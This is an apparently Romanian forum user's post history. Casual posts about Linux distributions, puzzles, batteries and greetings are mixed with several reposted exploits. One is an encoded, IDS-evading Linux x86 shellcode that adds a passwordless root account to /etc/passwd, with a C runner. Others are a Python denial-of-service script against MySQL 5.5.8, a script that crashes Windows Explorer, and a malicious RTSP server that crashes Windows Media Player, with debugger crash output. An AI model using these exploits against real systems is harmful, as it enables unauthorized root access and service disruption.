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Everything posted by LLegoLLaS

  1. The Last Combat of Slackware vs Ubuntu ps: pentru inceput ubuntu e mai ok .Mai user-friendly,mai usor de utilizat sau cum vrei s-o iei
  2. /* # Exploit Title: Linux/x86 Polymorphic ShellCode - setuid(0)+setgid(0)+add user 'iph' without password to /etc/passwd # setuid() - setgid() - open() - write() - close() - exit() # Date: 30/12/2011 # Author: pentesters.ir # Tested on: Linux x86 - CentOS 6.0 - 2.6.32-71 # Website: http://pentesters.ir/ # Contact: Cru3l.b0y@gmail.com # By: Cru3l.b0y # iph::0:0:IPH:/root:/bin/bash # This ShellCode is Anti-IDS # Encode: ADD 10 "\xb0\x17" // mov $0x17,%al "\x31\xdb" // xor %ebx,%ebx "\xcd\x80" // int $0x80 "\xb0\x2e" // mov $0x2e,%al "\x53" // push %ebx "\xcd\x80" // int $0x80 "\x6a\x05" // push $0x5 "\x58" // pop %eax "\x31\xc9" // xor %ecx,%ecx "\x51" // push %ecx "\x68\x73\x73\x77\x64" // push $0x64777373 "\x68\x2f\x2f\x70\x61" // push $0x61702f2f "\x68\x2f\x65\x74\x63" // push $0x6374652f "\x89\xe3" // mov %esp,%ebx "\x66\xb9\x01\x04" // mov $0x401,%cx "\xcd\x80" // int $0x80 "\x89\xc3" // mov %eax,%ebx "\x6a\x04" // push $0x4 "\x58" // pop %eax "\x31\xd2" // xor %edx,%edx "\x52" // push %edx "\x68\x62\x61\x73\x68" // push $0x68736162 "\x68\x62\x69\x6e\x2f" // push $0x2f6e6962 "\x68\x6f\x74\x3a\x2f" // push $0x2f3a746f "\x68\x3a\x2f\x72\x6f" // push $0x6f722f3a "\x68\x3a\x49\x50\x48" // push $0x4850493a "\x68\x3a\x30\x3a\x30" // push $0x303a303a "\x68\x69\x70\x68\x3a" // push $0x3a687069 "\x89\xe1" // mov %esp,%ecx "\x6a\x1c" // push $0x1c "\x5a" // pop %edx "\xcd\x80" // int $0x80 "\x6a\x06" // push $0x6 "\x58" // pop %eax "\xcd\x80" // int $0x80 "\x6a\x01" // push $0x1 "\x58" // pop %eax "\xcd\x80" // int $0x80 */ // ##### ANTI IDS SHELLCODE ##### #include <stdio.h> #include <stdlib.h> #include <string.h> char sc[] = "\xeb\x11\x5e\x31\xc9\xb1\x64\x80\x6c\x0e\xff\x0a\x80\xe9" "\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\xba\x21\x3b\xe5" "\xd7\x8a\xba\x38\x5d\xd7\x8a\x74\x0f\x62\x3b\xd3\x5b\x72" "\x7d\x7d\x81\x6e\x72\x39\x39\x7a\x6b\x72\x39\x6f\x7e\x6d" "\x93\xed\x70\xc3\x0b\x0e\xd7\x8a\x93\xcd\x74\x0e\x62\x3b" "\xdc\x5c\x72\x6c\x6b\x7d\x72\x72\x6c\x73\x78\x39\x72\x79" "\x7e\x44\x39\x72\x44\x39\x7c\x79\x72\x44\x53\x5a\x52\x72" "\x44\x3a\x44\x3a\x72\x73\x7a\x72\x44\x93\xeb\x74\x26\x64" "\xd7\x8a\x74\x10\x62\xd7\x8a\x74\x0b\x62\xd7\x8a"; int main() { int (*fp)() = (int(*)())sc; printf("bytes: %u\n", strlen(sc)); fp(); } Copyright 2012 - BugSearch About Us - Tell a Friend - Send sursa
  3. 4.7 MERCALI;) ps: nu fiti superstitiosi ca aduce ghinion:))
  4. #Becuri: depinde de suprafata pe care cad #Cea cu ancora: mai complicata decat pare.Daca ai o bila de metal (ancora) si o scufunzi intr-o cana (bazin) nivelul lichidului din cana va creste cu x milimetri.Daca insa pui bila pe o minge de ping-pong taiata nivelul apei va creste mai mult. Raspunsul la intrebvare este: nivelul apei scade #Buruieni: ai n buruieni. n-2 =trandafiri (1) (n-2)-2 =margarete (2) [(n-2)-2]-2=lalele. (3) (1)(2)(3) => ai cel putin 6 flori (pt pesimisti) sau cel putin 7 (pt optimisti) #Nemtii is cei mai inalti:Consult statisticile? @cris2decoder da
  5. programul lui se ocupa de Half Open Connections probabil.N-am stat sa ma uit. @justfor nu mai posta programe de genu
  6. Daca am mai vazut asa ceva sigur a fost cu multe milioane de ani in urma,reconstituit pe calculator si difuzat pe discovery,la o ora tarzie. "Tulai doamni si traznesti" LE: toata lumea face petitii pentru orice.Nu se poate face una sa se desfiinteze dracu jocu ala?Dispus sa donez pentru asta
  7. Cat i-ai dat pe forum? Cunostinte?
  8. import socket, sys print "\n" print "----------------------------------------------------------------" print "| MySQL 5.5.8 Null Ptr (windows) |" print "| Level Smash the Stack |" print "----------------------------------------------------------------" print "\n" buf=("&\x00\x00\x01\x85\xa2\x03\x00\x00\x00\x00@\x93\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00root\x00\x00") buf2=("\x11\x00\x00\x00\x03set autocommit30") def usage(): print "usage : ./mysql.py <victim_ip>" print "example: ./mysql.py" def main(): if len(sys.argv) != 2: usage() sys.exit() s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) HOST = sys.argv[1] PORT = int(3306) s.connect((HOST,PORT)) print "[*] Connect" s.send(buf) print "[*] Payload 1 sent" s.send(buf2) print "[*] Payload 2 sent\n", "[*] Run again to ensure it is down..\n" s.close() if __name__ == "__main__": main() sursa
  9. # Windows 2008 SP2 RC2 Explorer Go Byebye # Windows 7 Pro SP1 Explorer Go Byebye # Interesting # Brought to you by Level & z0r0 @ Smash The Stack from win32com.shell import shell, shellcon from os import mkdir try: mkdir("c:\\trigger_alt") except: print "[!] Trigger Directory Exists" try: mkdir("c:\\trigger_alt\\....") except: print "[!] Trigger Sub Directory Exists" print "[!] Triggering Issue" # This moves the directory containing the sub directory which creates the condition. # The issue is in the function that moves the files to the recycle bin # Replicate this using the following # 1- mkdir c:\trigger_alt # 2- cd c:\trigger_alt # 3- mkdir ....\ # 4- My Computer -> c:\trigger_alt # 5- Right Click -> Delete shell.SHFileOperation((0,shellcon.FO_DELETE,'c:\\trigger_alt',None,shellcon.FOF_ALLOWUNDO|shellcon.FOF_NOCONFIRMATION)) Copyright 2011 - BugSearch sursa
  10. import socket, binascii print "\n" print "----------------------------------------------------------------" print "| WMP11 Remote Null Pointer |" print "| Level, Smash the Stack |" print "| Windows XP SP3 x86, Windows Media Player v11.0.5721.5262 |" print "| Windows 7 SP2 x64, Windows Media Player v11.0.5721.5262 |" print "----------------------------------------------------------------" print "\n" print "Attack URL: mms://\n\n" HOST = "" PORT = 554 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind((HOST, PORT)) s.listen(1) buf = [ ("525453502f312e3020323038204f4b0d0a436f6e74656e742d547970653a206170706c696361746" "96f6e2f7364700d0a566172793a204163636570740d0a582d506c61796c6973742d47656e2d49643" "a203137360d0a582d42726f6164636173742d49643a20300d0a436f6e74656e742d4c656e6774683" "a203837390d0a446174653a2053756e2c203038204d617920323031312031353a32343a333320474" "d540d0a435365713a20310d0a5365727665723a20574d5365727665722f392e312e312e333834310" "d0a537570706f727465643a20636f6d2e6d6963726f736f66742e776d2e73727670706169722c206" "36f6d2e6d6963726f736f66742e776d2e737377697463682c20636f6d2e6d6963726f736f66742e7" "76d2e656f736d73672c20636f6d2e6d6963726f736f66742e776d2e6661737463616368652c20636" "f6d2e6d6963726f736f66742e776d2e7061636b657470616972737372632c20636f6d2e6d6963726" "f736f66742e776d2e7374617274757070726f66696c650d0a4c6173742d4d6f6469666965643a205" "361742c2031372046656220323030372031333a31343a303420474d540d0a457461673a202231363" "8220d0a43616368652d436f6e74726f6c3a206d61782d6167653d38363339392c20782d776d732d7" "3747265616d2d747970653d2262726f6164636173742c20706c61796c697374222c206d7573742d7" "26576616c69646174652c20707269766174652c20782d776d732d70726f78792d73706c69740d0a0" "d0a763d306f3d2d20323031313035303831343339313330343036203230313130353038313433393" "1333034303620494e20495034203132372e302e302e310d0a733d3c4e6f205469746c653e633d494" "e2049503420302e302e302e30623d52523a30613d70676d70753a646174613a6170706c696361746" "96f6e2f766e642e6d732e776d732d6864722e61736676313b6261736536342c4d4361796459356d7" "a78476d3251437141474c4f624e4142414141414141414142674141414145436f6479726a4565707" "a78474f35414441444342545a5767414141414141414141414141414141414141414141414141414" "1414141414c784141414141414141414141414141414141414141664141414141414141414843677" "7676b4141414141764d6e50435141414141433546514141414141414141414141414147416741414" "26749414145673741414331413739664c716e504559376a414d414d49464e6c4c674141414141414" "141415230744f7275716e504559376d414d414d49464e6c42674141414141416b516663743765707" "a78474f35674441444342545a566f414141414141414141414f4562746b35627a78476f2f5143415" "83178454b7742582b794256573838527150304167463963524373414141414141414141414177414" "1414141414141414151414141414141514145414150414141414141414141416b516663743765707" "a78474f35674441444342545a5849414141414141414141514a35702b4531627a78476f2f5143415" "83178454b31444e77372b50596338526937494171674330346941414141414141414141414277414" "1414149414141414167414141414141595145424145416641414151414141414151415141416f414" "143494141434141414141414141455141424141415141417a6e5834653431473052474e676742676" "c386d69736959414141414141414141416741424145673741414143414567374141417a4a724a316" "a6d62504561625a414b6f41597335734b67414141414141414141434141494141674143414141414" "141414141414141414141324a724a316a6d62504561625a414b6f415973357337443441414141414" "1414141414141414141414141414141414141414141414148774141414141414141414241513d3d7" "43d3020300d0a6d3d617564696f2030205254502f415650203936613d72656c6961626c650d0a0d0" "a0d0a") ] while True: conn, addr = s.accept() print "-----Request From Client-----\n" print conn.recv(1024) print "-----Request From Client-----\n" print "-----Response From Server-----\n" print binascii.unhexlify(buf[0]) print "-----Response From Server-----\n" conn.send(binascii.unhexlify(buf[0])) conn.close() s.close() #CRASH #(ae8.5b8): Access violation - code c0000005 (first chance) #First chance exceptions are reported before any exception handling. #This exception may be expected and handled. #eax=00000000 ebx=02ba4df8 ecx=00000000 edx=02b5c688 esi=013acff8 edi=00000000 #eip=128cd479 esp=02ebfb64 ebp=02ebfeec iopl=0 nv up ei pl zr na pe nc #cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 #*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\wmnetmgr.dll - #wmnetmgr!DllUnregisterServer+0x76320: #128cd479 8bb914010000 mov edi,dword ptr [ecx+114h] ds:0023:00000114=???????? #0:021> g #(ae8.5b8): Access violation - code c0000005 (!!! second chance !!!) #eax=00000000 ebx=02ba4df8 ecx=00000000 edx=02b5c688 esi=013acff8 edi=00000000 #eip=128cd479 esp=02ebfb64 ebp=02ebfeec iopl=0 nv up ei pl zr na pe nc #cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 #wmnetmgr!DllUnregisterServer+0x76320: #128cd479 8bb914010000 mov edi,dword ptr [ecx+114h] ds:0023:00000114=???????? #PAYLOAD# #RTSP/1.0 208 OK #Content-Type: application/sdp #Vary: Accept #X-Playlist-Gen-Id: 176 #X-Broadcast-Id: 0 #Content-Length: 879 #Date: Sun, 08 May 2011 15:24:33 GMT #CSeq: 1 #Server: WMServer/ #Supported: com.microsoft.wm.srvppair, com.microsoft.wm.sswitch, com.microsoft.wm.eosmsg, com.microsoft.wm.fastcache, com.microsoft.wm.packetpairssrc, com.microsoft.wm.startupprofile #Last-Modified: Sat, 17 Feb 2007 13:14:04 GMT #Etag: "168" #Cache-Control: max-age=86399, x-wms-stream-type="broadcast, playlist", must-revalidate, private, x-wms-proxy-split #v=0o=- 201105081439130406 201105081439130406 IN IP4 #s=<No Title>c=IN IP4;base64,MCaydY5mzxGm2QCqAGLObNABAAAAAAAABgAAAAECodyrjEepzxGO5ADADC #BTZWgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALxAAAAAAAAAAAAAAAAAAAAfAAAAAAAAAHCgwgkAAAAAvM #nPCQAAAAC5FQAAAAAAAAAAAAAGAgAABgIAAEg7AAC1A79fLqnPEY7jAMAMIFNlLgAAAAAAAAAR0tOruq #nPEY7mAMAMIFNlBgAAAAAAkQfct7epzxGO5gDADCBTZVoAAAAAAAAAAOEbtk5bzxGo/QCAX1xEKwBX+y #BVW88RqP0AgF9cRCsAAAAAAAAAAAwAAAAAAAAAAQAAAAAAQAEAAPAAAAAAAAAAkQfct7epzxGO5gDADC #BTZXIAAAAAAAAAQJ5p+E1bzxGo/QCAX1xEK1DNw7+PYc8Ri7IAqgC04iAAAAAAAAAAABwAAAAIAAAAAg #AAAAAAYQEBAEAfAAAQAAAAAQAQAAoAACIAACAAAAAAAAEQABAAAQAAznX4e41G0RGNggBgl8misiYAAA #AAAAAAAgABAEg7AAACAEg7AAAzJrJ1jmbPEabZAKoAYs5sKgAAAAAAAAACAAIAAgACAAAAAAAAAAAAAA #A2JrJ1jmbPEabZAKoAYs5s7D4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAHwAAAAAAAAABAQ==t=0 0m=audio 0 RTP/AVP 96a=reliable sursa
  11. Vezi in bios sa fie setarile corecte pentru boot.Incearca un restore default.Daca nu, repair cu cdu
  12. LLegoLLaS


    Free Torch Nokia 6303 Classic Java Apps - Mobiles24.com
  13. Cade-n cur si se ridica Bine ai venit shogore =)
  14. Bine ai venit ;)tine-te de treaba
  15. cel putin o ora te tin cred ps: there is only one way to find out
  16. La mine nu se downloadeaza chat.php indiferent de browser. @Nytro Te-as ruga sa-mi setezi Join date(mar2008),rep power (5) si sutom title (668.5)
  17. depinde de care is: NiCD,NiMH, depinde si de capacitate (cati mAh) si bineinteles la ce ii folosesti,depinde de aseamenea de gradul de uzura,de calitate (una e serioux si alta e duracell sau energizer)
  18. sa-mi moara ce-am pe casa daca am inteles ce ai vrut sa zici
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